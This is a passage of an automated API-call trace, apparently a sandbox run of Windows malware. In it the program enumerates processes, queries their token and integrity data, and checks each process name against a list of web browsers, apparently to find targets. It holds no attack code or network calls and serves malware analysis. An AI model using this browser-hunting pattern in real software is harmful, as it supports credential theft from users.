SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238ecb1 [0319.329] GetSidSubAuthority (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238ecb8 [0319.329] CloseHandle (hObject=0x444) returned 1 [0319.329] CloseHandle (hObject=0x5b0) returned 1 [0319.329] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0319.329] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0319.329] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0319.329] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0319.329] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0319.329] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0319.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0319.330] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0319.330] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0319.330] GetLastError () returned 0x7a [0319.330] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238ef58, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef58, ReturnLength=0x275fc44) returned 1 [0319.330] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0319.330] CloseHandle (hObject=0x444) returned 1 [0319.330] CloseHandle (hObject=0x5b0) returned 1 [0319.330] GetLengthSid (pSid=0x238ef60*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0319.330] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247fc0, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x14\x02\x13") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.330] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0319.330] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0319.330] GetLastError () returned 0x7a [0319.330] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eca8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eca8, ReturnLength=0x275fc70) returned 1 [0319.330] GetSidSubAuthorityCount (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238ecb1 [0319.330] GetSidSubAuthority (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238ecb8 [0319.330] CloseHandle (hObject=0x444) returned 1 [0319.330] CloseHandle (hObject=0x5b0) returned 1 [0319.330] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0319.330] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0319.330] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0319.330] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0319.330] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0319.330] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0319.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0319.330] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0319.330] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0319.330] GetLastError () returned 0x7a [0319.330] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238ef58, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef58, ReturnLength=0x275fc44) returned 1 [0319.330] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0319.330] CloseHandle (hObject=0x444) returned 1 [0319.330] CloseHandle (hObject=0x5b0) returned 1 [0319.330] GetLengthSid (pSid=0x238ef60*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0319.331] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x2487a8, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x14\x02\x14") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.331] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0319.331] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0319.331] GetLastError () returned 0x7a [0319.331] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eca8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eca8, ReturnLength=0x275fc70) returned 1 [0319.331] GetSidSubAuthorityCount (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238ecb1 [0319.331] GetSidSubAuthority (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238ecb8 [0319.331] CloseHandle (hObject=0x444) returned 1 [0319.331] CloseHandle (hObject=0x5b0) returned 1 [0319.331] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0319.331] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0319.331] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0319.331] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0319.331] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0319.331] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0319.331] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.331] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0321.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x275fc94 | out: SystemInformation=0x0, ResultLength=0x275fc94*=0xab60) returned 0xc0000004 [0321.336] VirtualAlloc (lpAddress=0x0, dwSize=0xbb60, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0321.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x240000, Length=0xbb60, ResultLength=0x0 | out: SystemInformation=0x240000, ResultLength=0x0) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0321.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0321.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0321.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0321.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0321.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0321.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0321.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0321.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0321.338] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0321.338] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0321.338] GetLastError () returned 0x7a [0321.338] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238f018, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238f018, ReturnLength=0x275fc44) returned 1 [0321.338] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0321.338] CloseHandle (hObject=0x444) returned 1 [0321.338] CloseHandle (hObject=0x5b0) returned 1 [0321.338] GetLengthSid (pSid=0x238f020*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0321.338] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x2488b8, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x13\x1a3") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.338] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0321.338] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0321.339] GetLastError () returned 0x7a [0321.339] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eaa8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eaa8, ReturnLength=0x275fc70) returned 1 [0321.339] GetSidSubAuthorityCount (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238eab1 [0321.339] GetSidSubAuthority (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238eab8 [0321.339] CloseHandle (hObject=0x444) returned 1 [0321.339] CloseHandle (hObject=0x5b0) returned 1 [0321.339] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0321.339] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0321.339] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0321.339] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0321.339] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0321.339] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0321.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0321.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0321.339] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0321.339] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0321.339] GetLastError () returned 0x7a [0321.340] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238f018, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238f018, ReturnLength=0x275fc44) returned 1 [0321.340] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0321.340] CloseHandle (hObject=0x444) returned 1 [0321.340] CloseHandle (hObject=0x5b0) returned 1 [0321.340] GetLengthSid (pSid=0x238f020*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0321.340] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x246960, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x13\x1a4") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.340] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0321.340] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0321.340] GetLastError () returned 0x7a [0321.340] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eaa8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eaa8, ReturnLength=0x275fc70) returned 1 [0321.340] GetSidSubAuthorityCount (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238eab1 [0321.340] GetSidSubAuthority (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238eab8 [0321.340] CloseHandle (hObject=0x444) returned 1 [0321.340] CloseHandle (hObject=0x5b0) returned 1 [0321.341] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0321.341] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0321.341] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0321.341] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0321.341] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0321.341] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0321.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0321.341] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0321.341] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0321.341] GetLastError () returned 0x7a [0321.341] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238f018, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238f018, ReturnLength=0x275fc44) returned 1 [0321.342] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0321.343] CloseHandle (hObject=0x444) returned 1 [0321.343] CloseHandle (hObject=0x5b0) returned 1 [0321.343] GetLengthSid (pSid=0x238f020*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0321.343] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x246fe0, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x13\x1a5") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.343] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0321.343] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0321.343] GetLastError () returned 0x7a [0321.343] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eaa8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eaa8, ReturnLength=0x275fc70) returned 1 [0321.343] GetSidSubAuthorityCount (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238eab1 [0321.343] GetSidSubAuthority (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238eab8 [0321.343] CloseHandle (hObject=0x444) returned 1 [0321.343] CloseHandle (hObject=0x5b0) returned 1 [0321.344] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0321.344] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0321.344] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0321.344] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0321.344] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0321.344] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0321.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0321.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0321.344] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0321.344] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0321.344] GetLastError () returned 0x7a [0321.344] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238f018, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238f018, ReturnLength=0x275fc44) returned 1 [0321.344] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0321.344] CloseHandle (hObject=0x444) returned 1 [0321.344] CloseHandle (hObject=0x5b0) returned 1 [0321.344] GetLengthSid (pSid=0x238f020*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0321.345] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x2478e8, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x13\x1a6") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.345] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0321.345] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0321.345] GetLastError () returned 0x7a [0321.345] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eaa8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eaa8, ReturnLength=0x275fc70) returned 1 [0321.345] GetSidSubAuthorityCount (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238eab1 [0321.345] GetSidSubAuthority (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238eab8 [0321.345] CloseHandle (hObject=0x444) returned 1 [0321.345] CloseHandle (hObject=0x5b0) returned 1 [0321.345] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.345] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.345] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0321.345] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.346] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.346] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0321.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0321.346] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0321.346] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0321.346] GetLastError () returned 0x7a [0321.346] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238f018, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238f018, ReturnLength=0x275fc44) returned 1 [0321.346] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0321.346] CloseHandle (hObject=0x444) returned 1 [0321.346] CloseHandle (hObject=0x5b0) returned 1 [0321.346] GetLengthSid (pSid=0x238f020*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0321.346] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247c90, 